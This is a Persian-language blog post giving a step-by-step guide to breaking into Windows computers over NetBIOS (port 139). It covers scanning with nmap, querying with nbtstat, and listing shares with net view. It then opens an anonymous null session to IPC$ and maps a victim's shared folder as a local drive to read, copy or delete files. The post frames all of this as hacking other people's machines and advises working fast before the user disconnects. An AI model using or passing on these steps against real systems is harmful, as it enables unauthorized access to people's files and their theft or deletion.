X
تبلیغات
رایتل

مقاله های علمی و تخصصی
 
مقاله دانشجویی ، شبکه های کامپیوتری ، شناسایی و حذف ویروس ، امنیت شبکه و سیستم عامل

NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاری است که اجازه به اشتراک گذاشتن منابع را به ما می‌دهد. ما برای به اشتراک گذاشتن فایل‌ها و یا پرینتر می‌تونیم از این پروتکل استفاده کنیم. نکته مهم این است که NetBIOS فقط در سیستم‌عامل ویندوز معنی دارد (اگرچه ابزارهایی مثل Samba در لینوکس می‌توانند آنرا شبیه سازی کنند ولی اینجا منظور خود پروتکل NetBIOS است).

وقتی NetBIOS در ویندوز فعال باشد، بلافاصله سه  پورت برای استفاده باز می‌شوند. پورت مهم و اصلی پورت ۱۳۹ در tcp است که NetBIOS را هم با این پورت می‌شناسند. دو پورت دیگر، از نوع udp هستند و عبارتند از پورت ۱۳۷ برای name service و پورت ۱۳۹ برای Datagram service . وقتی قرار باشد که یک سیستم‌عامل ویندوز هک بشود ( خصوصا اگه کلاینت باشد ) یکی از اولین مواردی که به ذهن هکر می‌رسد، استفاده از NetBIOS . 
منظور از به اشتراک گذاشتن (Sharing) در مورد فایل‌ها و پرینتر‌ها چیست؟به اشتراک گذاشتن در مورد فایل‌ها یعنی قرار دادن تعدادی فایل در یک کامپیوتر خاص به طوریکه توسط سایر کامپیوترها قابل دسترسی و استفاده باشد. در مورد پرینتر به اشتراک گذاشتن یعنی طوری چاپگر متصل به یک کامپیوتر را تنظیم کنیم که توسط سایر کامپیوتر‌ها هم قابل استفاده باشه. با توجه به اینکه در سیستم‌عامل‌های ویندوز به صورت پیش‌فرض NetBIOS فعال است، پس می‌توان به تعدادی از فایل‌ها و فولدرهای تعدادی از کامپیوترهای روی شبکه دسترسی داشت و فایل‌ها را خواند و حتی کپی یا پاک کرد. 
چگونه با پورت ۱۳۹ صحبت کنیم؟ ۱- ابتدا باید پورت ۱۳۹ پورت اسکن می‌کنیم تا ip هایی را که پورت ۱۳۹ در آنها باز است، پیدا کنیم. من این کار را با nmap انجام می‌دم. فرض کنید که یک ip به شماره ۲۱۷.۲۱۸.۸۴.۲۹ را تست کرده و به نتیجه زیر برسیم:
Interesting ports on HOME-TU۶U۰AV۸۶Y (۲۱۷.۲۱۸.۸۴.۲۹):
Port State Service
۱۳۹/tcp open netbios-ssn
Remote operating system guess: Windows Millenn... (Me), Win ۲۰۰۰, or WinXP
این خروجی اعلام می‌کند که پورت ۱۳۹ باز است. پس می‌شود از این ip استفاده کرد.
۲- حالا می‌خوام با این پورت ارتباط برقرار کنم. اصولا باید مثل سابق از telnet یا nc استفاده کنیم ولی در مورد پورت ۱۳۹ روش ارتباطی فرق می‌کند. کامنت پرامت(cmd در run )را باز کرده و دستور زیر را می‌نویسیم:
nbtstat -A ۲۱۷.۲۱۸.۸۴.۲۹
دستور nbtstat یک ابزار خاص برای کار با NetBIOS است. دقت کنید که از پارامتر A- با ip مربوطه استفاده شده است. (دستور nbtstat دارای پارامتر‌های بسیاری است که اگه می‌خواهید همه را ببینید، بنویسید nbtstat و enter را بزنید.) 
این دستور چه‌ کاری می‌کند و خروجی به چه صورتی است:این دستور به ip مورد نظر وصل می‌شود و از آن می‌خواهد لیست منابعی را که به اشتراک گذاشته رو لیست کند. در این حالت ۲ حالت ممکن است اتفاق بیفتد:
الف) مواجهه با پیغام Host not found . این یعنی اینکه نمی‌تواند لیست منابع را از کامپیوتر دیگر بگیرد (یعنی NetBIOS سیستم مقصدغیر فعال است). یعنی اگرچه پورت ۱۳۹ بازاست ولی قابل استفاده نیست.
ب) ارتباط برقرار شود و لیست منابع اشتراکی لیست شود:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
HOME-TU۶U۰AV۸۶Y UNIQUE Registered
MSHOME GROUP Registered
HOME-TU۶U۰AV۸۶Y UNIQUE Registered
MSHOME GROUP Registered

MAC Address =۰۰-۵۳-۴۵-۰۰-۰۰-۰۰

۳- در این نتایج چیزی که کارایی دارد ،سطری است که دارد. اگر نباشد، یعنی نمی‌توانید از اشتراک گذاری فایل استفاده کنید در این مثال ما این سطر را داشتیم پس ادامه می‌دهیم. حالا می‌نویسم:
net view ۲۱۷.۲۱۸.۸۴.۲۹
دو حالت ممکنه اتفاق بیفتد:
الف) چاپ پیغام 
System error ۵ has occurred.
Access is denied.
این یعنی امکان ادامه دادن نیست. به عبارت دیگر ایست! در این حالت ترفندی بزنید، یک null session برقرار کنید با کامپیوتر مقصد. این حالت در مورد ویندوز‌های سری NT کار می کند  تایپ کنید:
net use ۲۱۷.۲۱۸.۸۴.۲۹IPC$ "" /user:"" 
چرا null session ؟ دلیلش اینه که یک ارتباط برقرار کردیم با  ip بدون username و بدون password . حالا اگر این دستور جواب داد می‌توانیم دوباره دستور net view ۲۱۷.۲۱۸.۸۴.۲۹ را تکرار کنیم.
ب) ممکنن است دستور ذکر شده جواب دهد و مثلا چاپ کند:
Shared resources at ۲۱۷.۲۱۸.۸۴.۲۹
Share name Type Used as Comment

------------------------------------------------
Printer Print Acrobat PDFWriter
Printer۲ Print Acrobat Distiller
SharedDocs Disk
The command completed successfully. 
دقت کنید که در این کامپیوتر یک فایل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو فایل باقی مانده برای پرینتر است).  آخرین دستور :
۴- برای اینکار باید یک درایو انتخاب کنید. مثلا فرض کنید که  اسم درایو :K باشد. حالا باید اسم درایو را برای اشتراک گذاشتن انتخاب کنید. برای این‌کار حرف بعدی در زبان انگلیسی رو به کار ببرید. مثلا اگر :K آخرین بود، حرف بعدیاز k  یعنی :L را انتخاب کرده و دستور زیر را می‌نویسیم:
net use L: ۲۱۷.۲۱۸.۸۴.۲۹SharedDocs
به اسم درایو، ip و نام مربوطه که ShareDocs دقت کنید. چون اصطلاحا به صورت null session ارتباط می‌گیریم، ممکن است کار نکند ولی اگر درست کار کند جواب این است 
The command completed successfully.
حالا My Computer رو باز کنید و ببینید که درایو جدید به لیست درایوها اضافه شده که می‌تونین مثل درایوهای معمولی با اون کار کنید و فایل کپی کنید و ...
۵- وقتی کار تموم شد می‌تونید درایو رو حذف کنید. برای اینکار می‌تونین روی درایو رایت‌کلیک کنید و Disconnect را انتخاب کنید. و یا اینکه از دستور net use /delete L:استفاده کنید.
◊ نکته
۱- یه روش جالب به جای مرحله ۴ در بالا اینه که مثلا در مرورگر یا در run بنویسید ۲۱۷.۲۱۸.۸۴.۲۹ که ip دارای اشتراک است و یا اینکه تایپ کنید SharedDocsت۲۱۷.۲۱۸.۸۴.۲۹ باید جواب بده
۳- NetBIOS فقط برای کلاینت‌ها نیست.
۴- اگر دارید یک کلاینت را هک می‌کنید، باید سریع عمل کنید تا قبل از اینکه کاربر disconnect کندکار شما بایدتمام شده باشد.
۵- روش‌های دیگری هم برای کار با NetBIOS هست که یکی  از روش‌ها استفاده از یک سری نرم‌افزارهای خاص است و نیز یک روش دیگه اعمال تغییرات در فایل‌های HOST و LMHOST و استفاده از find در سیستم‌عامل ویندوز است.  

استفاده از منابع اینترنتی



نوشته شده در تاریخ سه‌شنبه 2 آبان 1391 توسط قاسم عرفانی فر
 
تمامی حقوق این وبلاگ محفوظ است | طراحی : پیچک  

  • paper | قدس | قیمت ارز بازار آزاد